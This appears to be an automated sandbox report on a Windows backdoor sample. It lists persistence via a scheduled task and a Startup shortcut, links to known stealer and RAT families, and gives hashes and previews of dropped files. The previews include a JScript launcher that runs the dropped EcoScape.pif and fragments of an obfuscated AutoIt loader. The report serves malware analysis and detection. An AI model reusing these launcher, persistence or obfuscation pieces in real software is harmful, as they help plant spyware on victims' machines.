Classification:	mal100.troj.spyw.expl.evad.winEXE@46/20@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 98% Number of executed functions: 86 Number of non-executed functions: 249
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegAsm.exe, PID 1180 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:38:11	Task Scheduler	Run new task: Impaired path: wscript s>//B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
11:38:15	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url
13:11:07	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	package80171530600.jpg.lnk	Get hash	malicious	XWorm	Browse
	QJwM0vJ5mk.exe	Get hash	malicious	LummaC	Browse
	KFft85YL3j.exe	Get hash	malicious	RedLine	Browse
	order - NLDB-082-2024.bat	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	654309786.vbs	Get hash	malicious	XWorm	Browse
	409182726.vbs	Get hash	malicious	XWorm	Browse
	762544342.vbs	Get hash	malicious	XWorm	Browse
	2132544253.vbs	Get hash	malicious	XWorm	Browse
	zUTPSuwGIB.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse
	file.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse
C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	package80171530600.jpg.lnk	Get hash	malicious	XWorm	Browse
	QJwM0vJ5mk.exe	Get hash	malicious	LummaC	Browse
	4U9frILl8q.exe	Get hash	malicious	Unknown	Browse
	4U9frILl8q.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\EcoVision Dynamics\A

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
File Type:	ASCII text, with very long lines (943), with CRLF line terminators
Category:	dropped
Size (bytes):	484144
Entropy (8bit):	5.263538555806433
Encrypted:	false
SSDEEP:	6144:TaDj35GRl4eYXp8eaEC5VKRL9Ug9hkB6BBq3VG/CB0jse5:TTLEUko34t
MD5:	A8384A3F77CF55416BF3C996DEB5E11C
SHA1:	FB77D6B37D48394B75C0B2E18345E6358BC500C6
SHA-256:	DBAB0BDD3B8589B95B3839FB64A1C277C62BF0777FAA03DDE69AA883F2E3BFA1
SHA-512:	63F78B82D75427AD05A9844512310DAAA7FBC90A5E389C1EB6ED9E659065EE3930477B34ACA68C3B1D198D47EC847F913A68B6E0E680A8D02278ADAF8C683E99
Malicious:	false
Preview:	..Func BagsObserveLindsayRegistration($LPSYMANTEC, $LIMITATIONCONSPIRACYANNOTATEDBOND, $MANCHESTERVIEWINGACRE, $ExpandingTaiwan, $performtomatoletboring)..$GOVERNMENTDISTINCTION = '459283316547'..While 502..$preventingfixesexpanding = 429..Switch $preventingfixesexpanding..Case 428..Log(7223)..MemGetStats()..ObjGet(Controversial("83z107z103z121z123z120z107z115z107z116z122z121z100z76z107z114z114z117z125z100",7-1))..Floor(479)..PixelGetColor(Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1), Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1))..DirGetSize(Controversial("106z111z117z102z115z98z100z117z34z118z116z99z34z106z111z34z101z102z103z102z111z101z34",1-0))..Ceiling(9421)..ProgressOff()..$preventingfixesexpanding = $preventingfixesexpanding + 198328/198328..Case 429..$occursaluminiumnamely = Floor(382)..ExitLoop..Case 430..ObjGet(Controversial("70z81z89z80z78z81z67z70z34",2-0))..DirGetSize(Controversial("111z108z115z107z52z119z118z121z123z121z104z1

C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.770640588502847
Encrypted:	false
SSDEEP:	3:RiMIpGXJO9oMeNH5E5wWAX+d4a+kEkD5gdzcQK9P8y5uWAX+d4a+kEkD5gdzcQKU:RiJuOytNHCwWD+vkD7rP8ywWD+vkD7rm
MD5:	CA880452D2622FBE238A01ACB8D73CCB
SHA1:	B3F5C3898EEE72AF66260BE8924AC2E988FB7C26
SHA-256:	91E00907B1415FEB75080793106234C3B08C4863B6F39DD9773417BF11B619B5
SHA-512:	5E53A65F5145757B048A1EAAC949B716CB9597E74E59A27AEDD67399C70D75B3CFE521E742A862A6339FA4FA375CAC66C3183A6185D12B21A757A007ECC11D10
Malicious:	true
Preview:	new ActiveXObject("Wscript.Sh" + "ell").Run("\"C:\\Users\\user\\AppData\\Local\\EcoVision Dynamics\\EcoScape.pif\" \"C:\\Users\\user\\AppData\\Local\\EcoVision Dynamics\\A\"")

C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: package80171530600.jpg.lnk, Detection: malicious, Browse Filename: QJwM0vJ5mk.exe, Detection: malicious, Browse Filename: 4U9frILl8q.exe, Detection: malicious, Browse Filename: 4U9frILl8q.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\R

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (943), with CRLF line terminators
Category:	dropped
Size (bytes):	484144
Entropy (8bit):	5.263538555806433
Encrypted:	false
SSDEEP:	6144:TaDj35GRl4eYXp8eaEC5VKRL9Ug9hkB6BBq3VG/CB0jse5:TTLEUko34t
MD5:	A8384A3F77CF55416BF3C996DEB5E11C
SHA1:	FB77D6B37D48394B75C0B2E18345E6358BC500C6
SHA-256:	DBAB0BDD3B8589B95B3839FB64A1C277C62BF0777FAA03DDE69AA883F2E3BFA1
SHA-512:	63F78B82D75427AD05A9844512310DAAA7FBC90A5E389C1EB6ED9E659065EE3930477B34ACA68C3B1D198D47EC847F913A68B6E0E680A8D02278ADAF8C683E99
Malicious:	true
Preview:	..Func BagsObserveLindsayRegistration($LPSYMANTEC, $LIMITATIONCONSPIRACYANNOTATEDBOND, $MANCHESTERVIEWINGACRE, $ExpandingTaiwan, $performtomatoletboring)..$GOVERNMENTDISTINCTION = '459283316547'..While 502..$preventingfixesexpanding = 429..Switch $preventingfixesexpanding..Case 428..Log(7223)..MemGetStats()..ObjGet(Controversial("83z107z103z121z123z120z107z115z107z116z122z121z100z76z107z114z114z117z125z100",7-1))..Floor(479)..PixelGetColor(Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1), Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1))..DirGetSize(Controversial("106z111z117z102z115z98z100z117z34z118z116z99z34z106z111z34z101z102z103z102z111z101z34",1-0))..Ceiling(9421)..ProgressOff()..$preventingfixesexpanding = $preventingfixesexpanding + 198328/198328..Case 429..$occursaluminiumnamely = Floor(382)..ExitLoop..Case 430..ObjGet(Controversial("70z81z89z80z78z81z67z70z34",2-0))..DirGetSize(Controversial("111z108z115z107z52z119z118z121z123z121z104z1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: package80171530600.jpg.lnk, Detection: malicious, Browse Filename: QJwM0vJ5mk.exe, Detection: malicious, Browse Filename: KFft85YL3j.exe, Detection: malicious, Browse Filename: order - NLDB-082-2024.bat, Detection: malicious, Browse Filename: 654309786.vbs, Detection: malicious, Browse Filename: 409182726.vbs, Detection: malicious, Browse Filename: 762544342.vbs, Detection: malicious, Browse Filename: 2132544253.vbs, Detection: malicious, Browse Filename: zUTPSuwGIB.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cameras

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	6.624999634300709
Encrypted:	false
SSDEEP:	3072:yCE0Imbi80PtCZEMnVIPPBxT/sZydTmRxl:yClbfSCOMVIPPL/sZv
MD5:	D766F32452AB37F9D3F7442B79D3C7AA
SHA1:	A64451C419B835C894C4CCBAEC1F3B677FFB2865
SHA-256:	D746AAB00DA0D7A6642B750B8E74ECBB6E06A697A86C12C2E53D5402B2CB4F76
SHA-512:	BDA8B83D5CA2AB979286D7EB5179A5F2F998855AF08E09F9732813C935429C8404ACCF8EAA16B087D087314FAD5F2CAF5067C14E6EF61B699F71A4C89FC32AC4
Malicious:	false
Preview:	^.0.Tg....^].W..+....>f.....f..t....u._..u.3.f....2..j"..3....U..E.;E.v....].....]..U...0...L.3.E..E..E.V.u...u...1..j.^.0..f.....{...3.SW......M.}.].M.9.taj*Xf.E.j?Xf.E.3.f.E..E.P.6."T..YY..u..E.P3.PP.6.I.........M.QP.6.....................3.9.u..].}..M.+.3..M.......B...;.U.....#.t8.]....A..E.f.....f;E.u.+M.C.E........@.E.;.u.U.].].j..u.R..W.........u.....w.E....E..U.;.t\..+.E...A..E.f.....f;E.u.+M....A...+M.P.7.E..E...+.PR.9........uD.E.U..8....E...B.U.;.u..E.03...P.?g..Y.M..t....._[.M.3.^..G....].3.PPPPP.Ke....U..Q.M.SW3.Q.f.....f;.u..}.+......A+.M.;.v.j.X.WV._...j.S.....YY..t.W.u.SV........u5.u.+..~.u.SP.s........u..M.V.....j....f..Y..^_[..].3.PPPPP.d....U...`......L.3.E..U..M.S.].VWj\^j:.........../..._.....f;.....t.f;.t.f;.t....;.u...1f;.u..C.;.t.R3.WWS............j/..3.Zf;.t.j\Zf;.t.j:Zf;.t.....3.@+......A..hP.....#.............WP./_...........WWWPWS....I......u3......PWWS.v...........t.V....I...M._^3.[.0F....]......j..A.+..........Xf

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	5.194530949630662
Encrypted:	false
SSDEEP:	1536:iKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo:86whxjgarB/5elDWy4Z
MD5:	D42D5B6C62FC16537F9E02F6878A726B
SHA1:	558D6606042464216A725CDD4FFA5FBEE3F89754
SHA-256:	6DA998806AF8D45879B783B961B647DF7FE5B37CC182EFF6756DA0CA6079C4AB
SHA-512:	D5C843BE29F1A0D5F1A5DA701D98B6623D628A419D4A26854871E400E91CEEBCEC0FD8DA48116F9942AA8A41390405B5F10C9F7B447049BB9085C36ADE8CFF61
Malicious:	false
Preview:	................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................r.r.r.........r.r.r.r.r.r.r.r.r.r.r.r.........................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.........................r.r.r.r.................................................................................................................r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.........................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cutting

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	ASCII text, with very long lines (1047), with CRLF line terminators
Category:	dropped
Size (bytes):	16631
Entropy (8bit):	5.03845012402483
Encrypted:	false
SSDEEP:	384:qGCv/Va67w3ovnAP+k0YCFxFngvMdP0t1jEdKo/TeS3A/UD:Ev/VaAXAmOCdYMd+IbTTv
MD5:	374D1802B678505470AF77CC3FC02DFC
SHA1:	44A6E2EA73DE59223D6A52C0D2447AFD2951BA3D
SHA-256:	41E793CFB1B80F7FBF67DC2F2C00FD64DD37EB149F9C096C53A9024CA8BE7636
SHA-512:	F2B07757D20526188A112B6599DA04FDAF7D0CC18EB1DB9E12C81711537E5324B5DC617F96D4D92E51D6C0E1C274677B3F2E294A00F5D7AA74BBFE5AA01A7E5D
Malicious:	false
Preview:	Set Brief=o..tBPocket Loading Fairy Ethernet ..WcIdentifies Ghz Continent Parameter Everybody ..ZHLibrarian Loans ..nZSox Dry ..JEAggregate Board Denied Greatly Effective Roommate Tampa Emirates ..EWUsSn Clara ..FsAnMasters Minds Explicitly Tyler Preston Greensboro Landscape ..wjOriental Help Duke Virtue Derived Alan Imports Boolean ..nWECab Streams Engineer ..nFarFloor Mediterranean Polished Automation ..Set Forecasts=6..PKDAssignments Psychiatry Pushed Mark Converter Mesh Model ..cipGAfterwards Shall Specifics Bicycle Sometimes Merry Highest Tape Rich ..rLColumn Pipes Fraction ..COzDerek Hewlett Causing Retail Interpreted Tragedy Alot Instructions Piece ..oWApproaches Medal Demands Gpl Ware Cartridges Central ..Set Signal=v..HQWToday Lp Scan Newly ..hrOPrivileges Fatal Frequency Partner ..cyXScreensaver More Cambodia Breeds Buried Das Modern Parks Cu ..XWUpcoming Managed Lycos Butt Tu ..IMJGClause Martin Article ..mNxManga Request ..Set Alliance=9..PcAirports Ron Allocation Worlds Sn

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cutting.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1047), with CRLF line terminators
Category:	dropped
Size (bytes):	16631
Entropy (8bit):	5.03845012402483
Encrypted:	false
SSDEEP:	384:qGCv/Va67w3ovnAP+k0YCFxFngvMdP0t1jEdKo/TeS3A/UD:Ev/VaAXAmOCdYMd+IbTTv
MD5:	374D1802B678505470AF77CC3FC02DFC
SHA1:	44A6E2EA73DE59223D6A52C0D2447AFD2951BA3D
SHA-256:	41E793CFB1B80F7FBF67DC2F2C00FD64DD37EB149F9C096C53A9024CA8BE7636
SHA-512:	F2B07757D20526188A112B6599DA04FDAF7D0CC18EB1DB9E12C81711537E5324B5DC617F96D4D92E51D6C0E1C274677B3F2E294A00F5D7AA74BBFE5AA01A7E5D
Malicious:	false
Preview:	Set Brief=o..tBPocket Loading Fairy Ethernet ..WcIdentifies Ghz Continent Parameter Everybody ..ZHLibrarian Loans ..nZSox Dry ..JEAggregate Board Denied Greatly Effective Roommate Tampa Emirates ..EWUsSn Clara ..FsAnMasters Minds Explicitly Tyler Preston Greensboro Landscape ..wjOriental Help Duke Virtue Derived Alan Imports Boolean ..nWECab Streams Engineer ..nFarFloor Mediterranean Polished Automation ..Set Forecasts=6..PKDAssignments Psychiatry Pushed Mark Converter Mesh Model ..cipGAfterwards Shall Specifics Bicycle Sometimes Merry Highest Tape Rich ..rLColumn Pipes Fraction ..COzDerek Hewlett Causing Retail Interpreted Tragedy Alot Instructions Piece ..oWApproaches Medal Demands Gpl Ware Cartridges Central ..Set Signal=v..HQWToday Lp Scan Newly ..hrOPrivileges Fatal Frequency Partner ..cyXScreensaver More Cambodia Breeds Buried Das Modern Parks Cu ..XWUpcoming Managed Lycos Butt Tu ..IMJGClause Martin Article ..mNxManga Request ..Set Alliance=9..PcAirports Ron Allocation Worlds Sn

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fears

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	4.889503128449791
Encrypted:	false
SSDEEP:	384:0RD9HPmPuki09PrOa3HwwuBcozc/mwftIQXoSpu8888888888888888888888889:qD9vmPukxhSaAwuXc/mex/ST
MD5:	49141FA1580FF171C93AAD4EB541DDAB
SHA1:	E7D96F4358600E4AFC85460733DF06C7598C81B4
SHA-256:	A6F110CAEB2C931BAD058BCA3780DD4BCD4144AB16DEA37553A859CAA528B63E
SHA-512:	806D7CE5D8888AD7B55C45220E92837E69902FC483D08C12D5D899398986A88DF9663DEA79D3F18E355CB8EBE239AFFBA015B5C9F33D1EE9E08E501F7D26EFA7
Malicious:	false
Preview:	.......................?.......?.......B.......B.................x.P.D.?X...1..=.......................................?.......?......................0C......0C.....................................5@=.)d....U.5j..%..5...j.?...~...@5.w..z..A..lzZ?..............................\|?..Q-8.>=....W.?.0...k8=....p.?...x.9=..>...?.pn...5=..Y...?....Q.=..c....??...b6.=...Y...?.T.?...=.....>.?....W.!=.@.-32.?.D...z.=...p.(.?vP.(...=.`.....?.US.?.>=..e....?.g....7=.`.'..?.b../=...^s..?.}.#...=..J.wk.?zn.....=...N..?.LN...9=.@$".3.?5Wg4p.6=...T...?.Nv$^.)=....&.?....)..<..l..B.?.M....%=.`j....?.w....=. <.m.?E...2=...>..?....E..=..t.?..?.......=..O..Q.?.w(@...<....0..?Ac....0=.Py.p..?dr.y?..=...St).?4K....>=....$..?Qh.BC .=.0..ub.?-.....0=.......?.a>-..?=.......?...,..<..(lX .?.T@b. ==.P.....?.3.h,.%=...f.?.?.#.... =..V....?....6=.....Y.?...z. $=...G...? $.l.35=.@...n.?.[+...3=..R...?s.dLi.==.p.\|..?r.x"#.2=.@.....?\|.U...2=..l...?r..F..=...a...?.....4.=....Y..?sl.#{ =.`~R=..?

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Friends

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.0786986206709335
Encrypted:	false
SSDEEP:	1536:pYfv2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNI:pC2jfTq8QLeAg0Fuz08XvBN
MD5:	0CEC2E416A4658BB57E658D166BA8A96
SHA1:	C746A3070DE12EF164E8622C74D0A0857AB7CF4E
SHA-256:	92A2B4A8A9044997C5C3A11A1FDAF1A446ABA5248BF02D125D9BA8C1F3F06C4C
SHA-512:	6257914987A32213EA7ABCE7AE7FC042E1C2AB7009DD7206BA7B8B22FFE13D22B0BA233C668AD97999FF3F4EBF988CD9C8B1C66088107BB40285F01DC1F61FEE
Malicious:	false
Preview:	...1.O..t$$;......... ........;...................tY......tH......t.......u!Q............u.Q.w.....f.......W.u.jN.u...x.I._^..]........................u........w.....j.j.h.....7..H.I..i.............................=.....S.....d.....{.....j.P.D$...\.I........a...f... ..V...3.Vj.h.....t$ ..H.I.....:....D$X.D$TPVh>....t$ .D$d......H.I.........V.t$\|....................d)M.j.Y;........5T)M........t..\|$.9x..}.u........;G.t.A;.~.;..........jO...pT.G.P.4.....3.f......3.@.....5..I.j...f....{...j...f....n...j.j.h.....7..H.I.j.......I.3.f.......M......P.w.......4...3.Vj.h.....7..H.I..........D$X.D$TPVh>....7.D$d......H.I..........G4;G\..................................................u...........i......................w..D$.P.D$.PV.S.......}....T)M..L$.j......f.G.f.......w........T)M..T$.......x(...A....5.)M.. )M........$;.t.P........T)M..T$....h..I..........0)M..w.h0....7..H.I......3.PPP.5.)M.....I.j.j.3.V.5.)M.....I..u.....I..E..L$(..)M..t$(.t$0.D$4......B...E..L$@F.D$(h..L..t$8.B...V

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Keyboard

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	ASCII text, with very long lines (1261), with CRLF line terminators
Category:	dropped
Size (bytes):	195376
Entropy (8bit):	5.300847446916815
Encrypted:	false
SSDEEP:	3072:OAE6MKMiRL9Ug9hkB6BZPrm3mO/u/CB0jse5:9RL9Ug9hkB6BBq3VG/CB0jse5
MD5:	B7F27A133E90AE9A58E2559C9CAF9759
SHA1:	39B6E7DE5C6DC0252F9A05B308BF079E21E4872D
SHA-256:	3E0D772FAA0819C04B8E5C97B4FD02A78015B3B1D69AF0159F875E37F60BBB00
SHA-512:	6E696B4AC26EEAF56637EF52653F85AB7283BB2C7B87924A86EC2C180D9903AAA9B1F2A8B986477A7B25C545AFD918841E335223F76B70E66E7D43DCEFFF6BA9
Malicious:	false
Preview:	OSTINGS = Ceiling(3143)..ExitLoop..EndSwitch..WEnd..$effecteducatedstem = '26019122842798858030136285543328774143572933119460841099093568963'..While 222..$weightviacids = 575..Switch $weightviacids..Case 573..IsDeclared(Controversial("108z127z123z108z121z117z104z115z42z122z108z106z118z117z107z122z42z122z123z121z118z114z108z42z105z112z42",13-6))..Floor(278)..Ceiling(8159)..MemGetStats()..ObjGet(Controversial("83z111z109z110z122z127z67z86z108z67",7-1))..ProgressOff()..$weightviacids = $weightviacids + 452063/452063..Case 574..Exp(5002)..Cos(6857)..Cos(3355)..Log(5663)..Exp(3935)..Log(1098)..$weightviacids = $weightviacids + 951696/951696..Case 575..$DistrictGovernanceReplacing = Chr(8108)..ExitLoop..EndSwitch..WEnd..EndFunc..While 275..$IraqBritainFestivals = 516..Switch $IraqBritainFestivals..Case 515..MemGetStats()..Exp(9296)..IsDeclared(Controversial("89z76z85z87z88z68z79z79z92z38",5-2))..Cos(5352)..$IraqBritainFestivals = $IraqBritainFestivals + 848554/848554..Case 516..$solararrange

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	243712
Entropy (8bit):	6.577865735084548
Encrypted:	false
SSDEEP:	6144:1K5vPeDkjGgQaE/loUDtf0accB3gBmmLsiS+SAs:uvG4waEqOfFfB3gBTQ+SAs
MD5:	0FE23AAA844275CC69153C1C530F056A
SHA1:	6E7FD65663CFA44BA68C8367A1C415E999CB8371
SHA-256:	19942D356EC90F076D6EDA272030D4C341877FD7DF58FB7FF4C804BDDBF01D99
SHA-512:	E163B670FA69E5E540D0B9904D72F11F6F21B3F72D757D4CF96EDF6D8BC8D4E47DBB61A1483AAE979FEC31F41FF55D4E5A017FFE7B22E857787BD96F397BE1D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Papers

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
File Type:	data
Category:	dropped
Size (bytes):	273408
Entropy (8bit):	6.660024266194904
Encrypted:	false
SSDEEP:	6144:zHS3zcNPj0nEo3tb2j6AUkB0CThp6vmVnjphfhnvO5bLezWWt/Dd314V14ZgP/:zy3zcNPjmlGUkiCTD6vmVnNO5bLexRMX
MD5:	1F22516DB88C817A0A2690AE44D0D5A1
SHA1:	941957208145B05374152EEBCEB4B1E27AC567B6
SHA-256:	D8B1CE1A6DD67094E5A6B1C2B48115D561E7E012079BE031B48F1791A2ACBE12
SHA-512:	B46A51743DCC7E52BC00CBEEF2034D6568C93B09BCDF7BB86298BBEAA0A2FC4C9D4D5838EB545F263FC15D09A578AD9B57CB853D93667CADF8C51E8AE36A686A
Malicious:	false
Preview:	.t...............Q.r...F.............:...........g.......{E..$..zE.......wZ.$..{E..C.....IM....t..J.j..U..h....m.........R.T^...........+........@.......;.t.......................G..p........v.....{........S...BP.......V.E...P....;.t.P....I...M..H......................R.......`....R..X........G..p...l....v..d....O..q.........Q.H...w.........6q..P.Kn.....D......T..........[..........G..p.......v........P....E....P..;...........;E......................;...C........K....t#.J.j..U...,...m.....U..........x...R.\...U.......+.U..`......@..U..S....;.t....U..D......U..:...H...wr.$.0{E..F..........+K....t(.J.j..U..J,...m....E...................R.&\........................@......>.t................G..p........v.........G..p........v.................$.X{E....p..Z......j..6..............P..p.I.j......p../......j..6.i......r....K..(F..j..R......\......k..j..=......G...Q....<.........2.....j....'.................E..j.S.q..............u....[..m....I..p

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Plugins

Download File

